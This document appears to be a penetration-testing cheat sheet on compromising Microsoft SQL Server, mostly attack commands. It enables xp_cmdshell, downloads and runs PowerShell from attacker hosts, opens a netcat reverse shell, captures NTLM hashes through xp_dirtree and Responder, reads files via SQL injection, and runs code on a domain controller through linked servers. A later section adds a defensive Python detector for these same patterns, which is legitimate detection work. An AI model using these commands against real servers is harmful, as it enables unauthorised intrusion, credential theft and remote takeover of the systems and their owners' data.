
MSSQL

Login to MSSQL Server with SQSH

sqsh -S $IP -U sa -P <password>

> EXEC SP_CONFIGURE 'show advanced options',1;reconfigure
> EXEC SP_CONFIGURE 'xp_cmdshell',1;reconfigure

> xp_cmdshell "whoami"
> go

Reverse shell with PowerShell

> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
> go

The PowerShell payload above uses Nishang.

An MSSQL instance is normally registered with a Service Principal Name (SPN) in AD.

Checking from the compromised computer:

powershell -exec bypass

# import module
. .\GetUserSPN.ps1

Collect:

  • SAMAccountName

  • Service Principal Name

MSSQL Auth

  • Builtin\Users

  • sa (service account)

Do you have valid creds?

mssqlclient.py manager/operator:operator@manager.htb -windows-auth

# mssqlclient.py <domain>/<user>:<pass>@<full domain> -windows-auth

Enumeration for PrivEsc

Do you have access to the machine with mssql?

sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"

Using PowerUpSQL

# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")


Invoke-SQLAudit -Verbose

Capturing the NTLM Hash

Make sure you can run xp_dirtree from sqlcmd.

# setup responder
sudo responder -I tun0

# make the SQL Server connect to the attacker IP over SMB via a UNC path inside sqlcmd

sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"

MSSQL Read File

Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null

RCE with MSSQL

EXEC xp_cmdshell 'net user';
EXEC master.dbo.xp_cmdshell 'cmd.exe /c dir c:\';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
EXEC xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString(''http://10.10.x.y/reverse.ps1'')';


# reverse shell: power.ps1, served from the attacker host
iwr http://10.10.16.2/nc.exe -outfile c:\windows\tasks\nc.exe;
c:\windows\tasks\nc.exe -e powershell.exe 10.10.16.2 12345

EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell 'powershell -ep bypass iex(iwr http://10.10.16.2/power.ps1 -UseBasicParsing)';

# rlwrap nc -lvnp 12345

If you need to reactivate xp_cmdshell (disabled by default since SQL Server 2005):

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;

There is Azure AD and DCSync?

sqlcmd -Q "Use ADSync; select private_configuration_xml,encrypted_configuration FROM mms_management_agent"


# download the code as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')

Check Ability to Impersonate User

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options',1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe -e cmd 10.10.x.y 443"'

Impersonate dbo (database owner):

use msdb; EXECUTE AS USER = 'dbo';

Check Linked Servers

EXEC sp_linkedservers;
# if a linked server points to the DC, you can query it from the current SQL Server

SELECT version FROM OPENQUERY("DC01", 'SELECT @@VERSION AS version');
SELECT myuser FROM OPENQUERY("DC01", 'SELECT SYSTEM_USER AS myuser');

# execute the RCE at dc01
EXEC ('sp_configure ''show advanced options'',1; reconfigure;') AT dc01
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01
EXEC ('xp_cmdshell ''powershell -enc <base64 powershell>'' ') AT dc01

Quoting inside nested MSSQL queries is error-prone, so passing the PowerShell command base64-encoded (-enc) is the cleanest option.
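As an added example that is not part of these notes: a small Python detector written from the defender's side, covering the activity the sections above rely on (enabling xp_cmdshell via sp_configure, xp_dirtree against a UNC path for NTLM capture, OPENROWSET BULK file reads, EXECUTE AS impersonation, EXEC ... AT on a linked server, and base64-encoded PowerShell). The ERRORLOG message format is the one SQL Server really writes when sp_configure changes an option; the timestamps, spids, the 10.10.14.5 address and the batch texts are constructed samples, and an Extended Events or SQL Audit session that captures batch text is assumed as the source of the batches.

```python
"""Scan SQL Server ERRORLOG lines and captured T-SQL batches for the
abuse patterns in these notes (xp_cmdshell enablement, UNC-path probes
via xp_dirtree, OPENROWSET BULK file reads, EXECUTE AS impersonation,
EXEC ... AT linked-server execution, base64-encoded PowerShell).
Sample data below is constructed; the ERRORLOG message text follows the
real format SQL Server writes when sp_configure changes an option."""
import re
from collections import Counter
from dataclasses import dataclass

# Real ERRORLOG message, e.g.
# "... spid57  Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install."
ERRORLOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)

# sp_configure options whose enablement commonly precedes OS command execution
DANGEROUS_OPTIONS = {"xp_cmdshell", "ole automation procedures", "clr enabled"}

# Rules over captured batch text (what an Extended Events sql_batch_completed
# session or a SQL Audit capturing batch text would record; assumed source)
STATEMENT_RULES = [
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    # xp_dirtree/xp_fileexist/xp_subdirs against a \\host\share UNC path
    ("unc-path-probe", re.compile(r"\bxp_(?:dirtree|fileexist|subdirs)\b[^;]*'\\\\[^']+", re.I)),
    ("execute-as", re.compile(r"\bEXECUTE\s+AS\s+(?:LOGIN|USER)\s*=", re.I)),
    ("openrowset-bulk", re.compile(r"\bOPENROWSET\s*\(\s*BULK\b", re.I)),
    # EXEC ('...') AT <linked server>: command forwarded to another instance
    ("linked-server-exec", re.compile(r"\bEXEC(?:UTE)?\s*\(.*\)\s*AT\s+\w+", re.I | re.S)),
    ("encoded-powershell", re.compile(r"\bpowershell\b.*?\s-e(?:nc|ncodedcommand)?\s", re.I)),
]


@dataclass(frozen=True)
class Finding:
    source: str  # "errorlog" or "batch"
    rule: str
    detail: str


def scan_errorlog(lines):
    """Flag every enablement (new value != 0) of a dangerous sp_configure option."""
    findings = []
    for line in lines:
        m = ERRORLOG_RE.match(line)
        if not m:
            continue
        option = m.group("option").lower()
        if option in DANGEROUS_OPTIONS and m.group("new") != "0":
            findings.append(Finding(
                "errorlog", f"enable:{option}",
                f"{m.group('ts')} {m.group('spid')} {option} {m.group('old')}->{m.group('new')}"))
    return findings


def scan_batches(batches):
    """Apply every statement rule to every captured batch; one finding per hit."""
    findings = []
    for batch in batches:
        for name, rx in STATEMENT_RULES:
            if rx.search(batch):
                findings.append(Finding("batch", name, " ".join(batch.split())[:80]))
    return findings


def summarize(findings):
    """Count findings per rule, e.g. {'xp_cmdshell': 3, ...}."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample input (timestamps, spids and 10.10.14.5 are made up)
SAMPLE_ERRORLOG = [
    "2024-03-02 09:14:01.12 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-03-02 09:14:01.15 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-03-02 09:20:33.40 spid12      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
    "2024-03-02 09:21:00.00 spid60      Starting up database 'tempdb'.",
]
SAMPLE_BATCHES = [
    "select name,create_date from sys.databases",               # benign
    "EXEC master.dbo.xp_cmdshell 'whoami'",
    "EXEC xp_dirtree '\\\\10.10.14.5\\share'",                   # UNC probe -> NTLM capture
    "EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER",
    "SELECT x FROM OPENROWSET(BULK 'C:\\Windows\\win.ini', SINGLE_CLOB) R(x)",
    "EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01",
    "EXEC xp_cmdshell 'powershell -enc SQBFAFgA'",
]

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG) + scan_batches(SAMPLE_BATCHES):
        print(f"[{f.source}] {f.rule}: {f.detail}")
    print(summarize(scan_batches(SAMPLE_BATCHES)))
```

The ERRORLOG rule only fires on enablement, so the 1-to-0 line (a cleanup) stays quiet; the batch rules are deliberately independent, so a single linked-server batch that also enables xp_cmdshell produces two findings, which is what you want when triaging.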


Last updated 7 months ago

References:

https://blog.xpnsec.com/azuread-connect-for-redteam/
https://www.netspi.com/blog/technical-blog/network-pentesting/hacking-sql-server-stored-procedures-part-2-user-impersonation/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
https://github.com/NetSPI/PowerUpSQL (PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server)